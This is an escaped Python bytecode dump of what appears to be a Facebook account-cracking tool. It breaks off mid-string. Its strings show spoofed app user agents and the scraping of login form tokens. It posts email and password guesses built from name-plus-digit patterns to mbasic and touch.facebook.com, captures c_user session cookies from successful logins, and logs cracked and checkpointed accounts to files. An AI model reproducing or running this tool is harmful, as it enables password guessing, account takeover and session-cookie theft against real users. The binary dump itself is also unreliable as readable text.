\x00\x83\x01\x00j\x13\x00}\x08\x00t\x14\x00|\x08\x00d!\x00\x83\x02\x00}\t\x00d"\x00d#\x00d$\x00d%\x00d&\x00d\'\x00d(\x00g\x07\x00}\n\x00xc\x00|\t\x00d)\x00\x83\x01\x00D]U\x00}\x0b\x00yE\x00|\x0b\x00j\x12\x00d*\x00\x83\x01\x00|\n\x00k\x06\x00rA\x02|\x06\x00j\x11\x00i\x01\x00|\x0b\x00j\x12\x00d+\x00\x83\x01\x00|\x0b\x00j\x12\x00d*\x00\x83\x01\x006\x83\x01\x00\x01n\x03\x00w\xfa\x01Wq\xfa\x01\x01\x01\x01q\xfa\x01Xq\xfa\x01W|\x06\x00j\x11\x00i\x0b\x00|\x02\x00d,\x006|\x05\x00d-\x006d.\x00d/\x006d.\x00d0\x006d.\x00d1\x006d.\x00d2\x006d.\x00d3\x006d4\x00d5\x006d4\x00d6\x006d4\x00d7\x006d8\x00d9\x006\x83\x01\x00\x01|\x07\x00j\x15\x00d:\x00d;\x00|\x06\x00\x83\x01\x01}\x0c\x00d<\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00rr\x03d=\x00j\x19\x00g\x00\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x1a\x00\x83\x00\x00D]\x1c\x00\\\x02\x00}\r\x00}\x0e\x00d>\x00|\r\x00|\x0e\x00f\x02\x00\x16^\x02\x00q\xf9\x02\x83\x01\x00}\x0f\x00d?\x00|\x02\x00|\x05\x00|\x0f\x00f\x03\x00\x16GHt\t\x00j\x1b\x00d@\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dA\x00t\x1c\x00\x16dB\x00\x83\x02\x00j\x05\x00dC\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq7\x01q7\x01dD\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00r7\x01dE\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x1b\x00d@\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dF\x00t\x1c\x00\x16dB\x00\x83\x02\x00j\x05\x00dC\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq7\x01q7\x01q7\x01Wt\x06\x00dG\x007a\x06\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(H\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\xec\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;], Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/255.0.0.8.119;]s\\\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;95m %s/%s \xe2\x80\xa2\xe2\x80\xa2> [OK:-%s] \xc2\xae \x1b[0;95m[CP:-%s] s\x03\x00\x00\x00<=>i\x06\x00\x00\x00Ry\x00\x00\x00Rz\x00\x00\x00R{\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00s\x1b\x00\x00\x00https://mbasic.facebook.comt\x06\x00\x00\x00origins#\x00\x00\x00id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7s\x0f\x00\x00\x00accept-languages\r\x00\x00\x00gzip, deflates\x0f\x00\x00\x00accept-encodingsU\x00\x00\x00text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8t\x06\x00\x00\x00accepts\n\x00\x00\x00user-agents\x13\x00\x00\x00mbasic.facebook.comt\x04\x00\x00\x00Hosts:\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8t\x07\x00\x00\x00referers\t\x00\x00\x00max-age=0s\r\x00\x00\x00cache-controlR=\x00\x00\x00s\x19\x00\x00\x00upgrade-insecure-requestss!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-types7\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&refid=8s\x0b\x00\x00\x00html.parsert\x03\x00\x00\x00lsdt\x07\x00\x00\x00jazoestt\x04\x00\x00\x00m_tst\x02\x00\x00\x00lit\n\x00\x00\x00try_numbert\x12\x00\x00\x00unrecognized_triesR<\x00\x00\x00R^\x00\x00\x00R+\x00\x00\x00t\x05\x00\x00\x00valuet\x05\x00\x00\x00emailt\x04\x00\x00\x00passR*\x00\x00\x00t\x15\x00\x00\x00prefill_contact_pointt\x0e\x00\x00\x00prefill_sourcet\x0c\x00\x00\x00prefill_typet\x14\x00\x00\x00first_prefill_sourcet\x12\x00\x00\x00first_prefill_typet\x05\x00\x00\x00falset\x10\x00\x00\x00had_cp_prefilledt\x16\x00\x00\x00had_password_prefilledt\r\x00\x00\x00is_smart_lockt\x04\x00\x00\x00truet\x0c\x00\x00\x00_fb_noscriptsy\x00\x00\x00https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8RV\x00\x00\x00t\x06\x00\x00\x00c_usert\x01\x00\x00\x00;s\x05\x00\x00\x00%s=%ss%\x00\x00\x00\r\x1b[0;92m[RAKA_AMANDA] %s|%s|%s\x1b[0;95ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRl\x00\x00\x00s\t\x00\x00\x00 + %s|%s\nt\n\x00\x00\x00checkpoints*\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s\x1b[0;96m s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x1d\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x83\x00\x00\x00RM\x00\x00\x00RW\x00\x00\x00R\x84\x00\x00\x00Rp\x00\x00\x00R\x13\x00\x00\x00Rn\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rm\x00\x00\x00R~\x00\x00\x00t\x06\x00\x00\x00updateR.\x00\x00\x00R\x88\x00\x00\x00t\x06\x00\x00\x00parserR8\x00\x00\x00t\x07\x00\x00\x00cookiest\x08\x00\x00\x00get_dictt\x04\x00\x00\x00keyst\x04\x00\x00\x00joint\x05\x00\x00\x00itemsRY\x00\x00\x00R\x89\x00\x00\x00(\x10\x00\x00\x00R\x8a\x00\x00\x00R\x8b\x00\x00\x00R\\\x00\x00\x00R+\x00\x00\x00R\x8c\x00\x00\x00Rr\x00\x00\x00t\x06\x00\x00\x00kwargsRs\x00\x00\x00t\x01\x00\x00\x00pt\x01\x00\x00\x00bt\x02\x00\x00\x00blR[\x00\x00\x00t\x04\x00\x00\x00gaaat\x03\x00\x00\x00keyR\x99\x00\x00\x00t\x04\x00\x00\x00kuki(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rg\x00\x00\x00[\x01\x00\x00sd\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x17\x02\x14\x01\x03\x01\r\x01\x06\x01\x0c\x01\x0c\x01V\x01\x12\x01\x0f\x01\x1b\x01\x13\x01\x03\x01\x15\x00)\x01\x07\x01\x03\x00\x08\x01Z\x01\x15\x01\x1b\x01A\x01\x12\x01\x17\x01$\x01\x01\x01\x06\x01\x1b\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x01\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\x01\x04\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn#\x00\x04t\x02\x00k\n\x00r>\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00d\x05\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x06\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\x07\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x08\x00k\x05\x00r\xc6\x00|\x03\x00|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17|\x03\x00d\x0b\x00\x17g\x04\x00}\x04\x00nm\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0c\x00k\x01\x00r\xf6\x00|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17|\x03\x00d\x0b\x00\x17g\x03\x00}\x04\x00n=\x00t\x07\x00|\x03\x00\x83\x01\x00d\r\x00k\x01\x00r\x1f\x01|\x03\x00d\t\x00\x17|\x03\x00d\x0b\x00\x17g\x02\x00}\x04\x00n\x14\x00|\x03\x00d\t\x00\x17|\x03\x00d\x0b\x00\x17g\x02\x00}\x04\x00y\xc0\x02x\xaf\x02|\x04\x00D]\xa7\x02}\x05\x00i\x00\x00}\x06\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x07\x00|\x07\x00j\x10\x00j\x11\x00i\n\x00d\x0e\x00d\x0f\x006d\x10\x00d\x11\x006d\x12\x00d\x13\x006d\x14\x00d\x15\x006|\x01\x00d\x16\x006d\x17\x00d\x18\x006d\x19\x00d\x1a\x006d\x1b\x00d\x1c\x006d\x1d\x00d\x1e\x006d\x1f\x00d \x006\x83\x01\x00\x01|\x07\x00j\x12\x00d!\x00\x83\x01\x00j\x13\x00}\x08\x00t\x14\x00|\x08\x00d"\x00\x83\x02\x00}\t\x00d#\x00d$\x00d%\x00d&\x00d\'\x00d(\x00d)\x00g\x07\x00}\n\x00xc\x00|\t\x00d*\x00\x83\x01\x00D]U\x00}\x0b\x00yE\x00|\x0b\x00j\x12\x00d+\x00\x83\x01\x00|\n\x00k\x06\x00rG\x02|\x06\x00j\x11\x00i\x01\x00|\x0b\x00j\x12\x00d,\x00\x83\x01\x00|\x0b\x00j\x12\x00d+\x00\x83\x01\x006\x83\x01\x00\x01n\x03\x00w\x00\x02Wq\x00\x02\x01\x01\x01q\x00\x02Xq\x00\x02W|\x06\x00j\x11\x00i\x0b\x00|\x02\x00d-\x006|\x05\x00d.\x006d/\x00d0\x006d/\x00d1\x006d/\x00d2\x006d/\x00d3\x006d/\x00d4\x006d5\x00d6\x006d5\x00d7\x006d5\x00d8\x006d9\x00d:\x006\x83\x01\x00\x01|\x07\x00j\x15\x00d;\x00d<\x00|\x06\x00\x83\x01\x01}\x0c\x00d=\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00rx\x03d>\x00j\x19\x00g\x00\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x1a\x00\x83\x00\x00D]\x1c\x00\\\x02\x00}\r\x00}\x0e\x00d?\x00|\r\x00|\x0e\x00f\x02\x00\x16^\x02\x00q\xff\x02\x83\x01\x00}\x0f\x00d@\x00|\x02\x00|\x05\x00|\x0f\x00f\x03\x00\x16GHt\t\x00j\x1b\x00dA\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dB\x00t\x1c\x00\x16dC\x00\x83\x02\x00j\x05\x00dD\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq=\x01q=\x01dE\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00r=\x01dF\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x1b\x00dA\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dG\x00t\x1c\x00\x16dC\x00\x83\x02\x00j\x05\x00dD\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq=\x01q=\x01q=\x01Wt\x06\x00dH\x007a\x06\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(I\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\x1f\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/255.0.0.8.119;]s\\\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;95m %s/%s \xe2\x80\xa2\xe2\x80\xa2> [OK:-%s] \xc2\xae \x1b[0;95m[CP:-%s] s\x03\x00\x00\x00<=>i\x06\x00\x00\x00Ry\x00\x00\x00Rz\x00\x00\x00R{\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00s\x1a\x00\x00\x00https://touch.facebook.comR\x8f\x00\x00\x00s#\x00\x00\x00id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7s\x0f\x00\x00\x00accept-languages\r\x00\x00\x00gzip, deflates\x0f\x00\x00\x00accept-encodingsU\x00\x00\x00text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8R\x90\x00\x00\x00s\n\x00\x00\x00user-agents\x12\x00\x00\x00touch.facebook.comR\x91\x00\x00\x00s9\x00\x00\x00https://touch.facebook.com/login/?next&ref=dbl&fl&refid=8R\x92\x00\x00\x00s\t\x00\x00\x00max-age=0s\r\x00\x00\x00cache-controlR=\x00\x00\x00s\x19\x00\x00\x00upgrade-insecure-requestss!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-types6\x00\x00\x00https://touch.facebook.com/login/?next&ref=dbl&refid=8s\x0b\x00\x00\x00html.parserR\x93\x00\x00\x00R\x94\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00R\x98\x00\x00\x00R<\x00\x00\x00R^\x00\x00\x00R+\x00\x00\x00R\x99\x00\x00\x00R\x9a\x00\x00\x00R\x9b\x00\x00\x00R*\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x9f\x00\x00\x00R\xa0\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00R\xa3\x00\x00\x00R\xa4\x00\x00\x00R\xa5\x00\x00\x00R\xa6\x00\x00\x00sw\x00\x00\x00https://touch.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Ftouch.facebook.com%2F&lwv=100&refid=8RV\x00\x00\x00R\xa7\x00\x00\x00R\xa8\x00\x00\x00s\x05\x00\x00\x00%s=%ss%\x00\x00\x00\r\x1b[0;92m[RAKA_AMANDA] %s|%s|%s\x1b[0;97ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRl\x00\x00\x00s\t\x00\x00\x00 + %s|%s\nR\xa9\x00\x00\x00s*\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s\x1b[0;96m s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x1d\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x83\x00\x00\x00RM\x00\x00\x00RW\x00\x00\x00R\x84\x00\x00\x00Rp\x00\x00\x00R\x13\x00\x00\x00Rn\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rm\x00\x00\x00R~\x00\x00\x00R\xaa\x00\x00\x00R.\x00\x00\x00R\x88\x00\x00\x00R\xab\x00\x00\x00R8\x00\x00\x00R\xac\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xaf\x00\x00\x00R\xb0\x00\x00\x00RY\x00\x00\x00R\x89\x00\x00\x00(\x10\x00\x00\x00R\x8a\x00\x00\x00R\x8b\x00\x00\x00R\\\x00\x00\x00R+\x00\x00\x00R\x8c\x00\x00\x00Rr\x00\x00\x00R\xb1\x00\x00\x00Rs\x00\x00\x00R\xb2\x00\x00\x00R\xb3\x00\x00\x00R\xb4\x00\x00\x00R[\x00\x00\x00R\xb5\x00\x00\x00R\xb6\x00\x00\x00R\x99\x00\x00\x00R\xb7\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rh\x00\x00\x00\x90\x01\x00\x00sf\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x17\x02\x14\x01\x03\x01\r\x01\x06\x01\x0c\x01\x0c\x01V\x01\x12\x01\x0f\x01\x1b\x01\x13\x01\x03\x01\x15\x00)\x01\x07\x01\x03\x00\x08\x01Z\x01\x15\x01\x1b\x01A\x01\x12\x01\x17\x01$\x01\x01\x01\x06\x01\x1b\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s\xb9\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00\x89\x01\x00Wn#\x00\x04t\x02\x00k\n\x00r>\x00\x01\x01\x01d\x03\x00\x89\x01\x00d\x04\x00\x89\x01\x00d\x05\x00\x89\x01\x00n\x01\x00Xd\x06\x00GHt\x03\x00d\x07\x00\x83\x01\x00j\x04\x00d\x08\x00\x83\x01\x00\x89\x00\x00t\x05\x00\x88\x00\x00\x83\x01\x00d\t\x00k\x02\x00rx\x00t\x06\x00d\n\x00\x83\x01\x00\x01n\x00\x00d\x0b\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d\x0c\x00\x86\x00\x00}\x00\x00t\x07\x00d\r\x00\x83\x01\x00}\x01\x00|\x01\x00j\x08\x00|\x00\x00t\t\x00\x83\x02\x00\x01t\x06\x00d\x0e\x00\x83\x01\x00\x01d\x00\x00S(\x0f\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\x1f\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/255.0.0.8.119;]sJ\x00\x00\x00\n[+] Type , For 2nd Password For Example : 112233,334455,445566,223344 etcs\x16\x00\x00\x00[+] Enter Passwords : t\x01\x00\x00\x00,R*\x00\x00\x00s\x0f\x00\x00\x00[?] Wrong Inputs0\x00\x00\x00[+] Enter 2-4 Passwords For Fast Cracking Speed\nc\x01\x00\x00\x00\x0e\x00\x00\x00\x08\x00\x00\x00\x13\x00\x00\x00s"\x03\x00\x00t\x00\x00j\x01\x00j\x02\x00d\x01\x00t\x03\x00t\x04\x00t\x05\x00\x83\x01\x00t\x04\x00t\x06\x00\x83\x01\x00t\x04\x00t\x07\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x00\x00j\x01\x00j\x08\x00\x83\x00\x00\x01|\x00\x00j\t\x00d\x02\x00\x83\x01\x00\\\x02\x00}\x01\x00}\x02\x00y\xc0\x02x\xaf\x02\x88\x00\x00D]\xa7\x02}\x03\x00i\x00\x00}\x04\x00|\x03\x00j\n\x00\x83\x00\x00}\x03\x00t\x0b\x00j\x0c\x00\x83\x00\x00}\x05\x00|\x05\x00j\r\x00j\x0e\x00i\n\x00d\x03\x00d\x04\x006d\x05\x00d\x06\x006d\x07\x00d\x08\x006d\t\x00d\n\x006\x88\x01\x00d\x0b\x006d\x0c\x00d\r\x006d\x0e\x00d\x0f\x006d\x10\x00d\x11\x006d\x12\x00d\x13\x006d\x14\x00d\x15\x006\x83\x01\x00\x01|\x05\x00j\x0f\x00d\x16\x00\x83\x01\x00j\x10\x00}\x06\x00t\x11\x00|\x06\x00d\x17\x00\x83\x02\x00}\x07\x00d\x18\x00d\x19\x00d\x1a\x00d\x1b\x00d\x1c\x00d\x1d\x00d\x1e\x00g\x07\x00}\x08\x00xc\x00|\x07\x00d\x1f\x00\x83\x01\x00D]U\x00}\t\x00yE\x00|\t\x00j\x0f\x00d \x00\x83\x01\x00|\x08\x00k\x06\x00rh\x01|\x04\x00j\x0e\x00i\x01\x00|\t\x00j\x0f\x00d!\x00\x83\x01\x00|\t\x00j\x0f\x00d \x00\x83\x01\x006\x83\x01\x00\x01n\x03\x00w!\x01Wq!\x01\x01\x01\x01q!\x01Xq!\x01W|\x04\x00j\x0e\x00i\x0b\x00|\x01\x00d"\x006|\x03\x00d#\x006d$\x00d%\x006d$\x00d&\x006d$\x00d\'\x006d$\x00d(\x006d$\x00d)\x006d*\x00d+\x006d*\x00d,\x006d*\x00d-\x006d.\x00d/\x006\x83\x01\x00\x01|\x05\x00j\x12\x00d0\x00d1\x00|\x04\x00\x83\x01\x01}\n\x00d2\x00|\x05\x00j\x13\x00j\x14\x00\x83\x00\x00j\x15\x00\x83\x00\x00k\x06\x00r\x99\x02d3\x00j\x16\x00g\x00\x00|\x05\x00j\x13\x00j\x14\x00\x83\x00\x00j\x17\x00\x83\x00\x00D]\x1c\x00\\\x02\x00}\x0b\x00}\x0c\x00d4\x00|\x0b\x00|\x0c\x00f\x02\x00\x16^\x02\x00q \x02\x83\x01\x00}\r\x00d5\x00|\x01\x00|\x03\x00|\r\x00f\x03\x00\x16GHt\x06\x00j\x18\x00d6\x00|\x01\x00|\x03\x00f\x02\x00\x16\x83\x01\x00\x01t\x19\x00d7\x00t\x1a\x00\x16d8\x00\x83\x02\x00j\x02\x00d9\x00|\x01\x00|\x03\x00f\x02\x00\x16\x83\x01\x00\x01Pq^\x00q^\x00d:\x00|\x05\x00j\x13\x00j\x14\x00\x83\x00\x00j\x15\x00\x83\x00\x00k\x06\x00r^\x00d;\x00|\x01\x00|\x03\x00f\x02\x00\x16GHt\x07\x00j\x18\x00d6\x00|\x01\x00|\x03\x00f\x02\x00\x16\x83\x01\x00\x01t\x19\x00d<\x00t\x1a\x00\x16d8\x00\x83\x02\x00j\x02\x00d9\x00|\x01\x00|\x03\x00f\x02\x00\x16\x83\x01\x00\x01Pq^\x00q^\x00q^\x00Wt\x03\x00d=\x007a\x03\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(>\x00\x00\x00Ns\\\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;95m %s/%s \xe2\x80\xa2\xe2\x80\xa2> [OK:-%s] \xc2\xae \x1b[0;95m[CP:-%s] s\x03\x00\x00\x00<=>s\x1b\x00\x00\x00https://mbasic.facebook.comR\x8f\x00\x00\x00s#\x00\x00\x00id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7s\x0f\x00\x00\x00accept-languages\r\x00\x00\x00gzip, deflates\x0f\x00\x00\x00accept-encodingsU\x00\x00\x00text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8R\x90\x00\x00\x00s\n\x00\x00\x00user-agents\x13\x00\x00\x00mbasic.facebook.comR\x91\x00\x00\x00s:\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8R\x92\x00\x00\x00s\t\x00\x00\x00max-age=0s\r\x00\x00\x00cache-controlR=\x00\x00\x00s\x19\x00\x00\x00upgrade-insecure-requestss!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-types7\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&refid=8s\x0b\x00\x00\x00html.parserR\x93\x00\x00\x00R\x94\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00R\x98\x00\x00\x00R<\x00\x00\x00R^\x00\x00\x00R+\x00\x00\x00R\x99\x00\x00\x00R\x9a\x00\x00\x00R\x9b\x00\x00\x00R*\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x9f\x00\x00\x00R\xa0\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00R\xa3\x00\x00\x00R\xa4\x00\x00\x00R\xa5\x00\x00\x00R\xa6\x00\x00\x00sy\x00\x00\x00https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8RV\x00\x00\x00R\xa7\x00\x00\x00R\xa8\x00\x00\x00s\x05\x00\x00\x00%s=%ss%\x00\x00\x00\r\x1b[0;92m[RAKA_AMANDA] %s|%s|%s\x1b[0;97ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRl\x00\x00\x00s\t\x00\x00\x00 + %s|%s\nR\xa9\x00\x00\x00s*\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s\x1b[0;96m s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x1b\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x83\x00\x00\x00RM\x00\x00\x00RW\x00\x00\x00R\x84\x00\x00\x00Rp\x00\x00\x00R\x13\x00\x00\x00Rn\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rm\x00\x00\x00R~\x00\x00\x00R\xaa\x00\x00\x00R.\x00\x00\x00R\x88\x00\x00\x00R\xab\x00\x00\x00R8\x00\x00\x00R\xac\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xaf\x00\x00\x00R\xb0\x00\x00\x00RY\x00\x00\x00R2\x00\x00\x00R\x89\x00\x00\x00(\x0e\x00\x00\x00R\x8a\x00\x00\x00R\\\x00\x00\x00R+\x00\x00\x00Rr\x00\x00\x00R\xb1\x00\x00\x00Rs\x00\x00\x00R\xb2\x00\x00\x00R\xb3\x00\x00\x00R\xb4\x00\x00\x00R[\x00\x00\x00R\xb5\x00\x00\x00R\xb6\x00\x00\x00R\x99\x00\x00\x00R\xb7\x00\x00\x00(\x02\x00\x00\x00t\x03\x00\x00\x00asuR\x8b\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00main\xd4\x01\x00\x00sL\x00\x00\x00\x00\x02\t\x01)\x01\r\x01\x15\x01\x03\x01\r\x01\x06\x01\x0c\x01\x0c\x01V\x01\x12\x01\x0f\x01\x1b\x01\x13\x01\x03\x01\x15\x00)\x01\x07\x01\x03\x00\x08\x01Z\x01\x15\x01\x1b\x01A\x01\x12\x01\x17\x01$\x01\x01\x01\x06\x01\x1b\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01i\x1e\x00\x00\x00s\x16\x00\x00\x00\n\n # [>Program 